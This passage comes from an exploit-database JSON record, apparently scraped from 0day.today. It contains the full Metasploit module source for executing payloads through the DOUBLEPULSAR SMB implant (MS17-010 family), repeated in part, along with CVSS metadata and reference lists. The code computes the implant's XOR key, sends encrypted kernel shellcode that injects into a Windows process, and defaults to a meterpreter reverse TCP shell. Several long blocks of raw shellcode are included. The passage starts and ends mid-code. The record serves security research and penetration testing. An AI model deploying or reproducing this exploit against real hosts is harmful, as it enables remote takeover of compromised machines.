base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-04] #"}, "lastseen": "2021-10-04T06:22:51", "differentElements": ["sourceData"], "edition": 34}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "d30694d93d20c7a703ef9a6460d32c5c", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-10-05T00:15:19", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:146236"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-29702", 
"1337DAY-ID-27803", "1337DAY-ID-27802", "1337DAY-ID-27786"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:42030", "EDB-ID:41891"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96705", "SMNTC-96707", "SMNTC-96703", "SMNTC-96706", "SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", 
"TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-05T00:15:19", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-10-05T00:15:19", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires 
Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => 
MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n 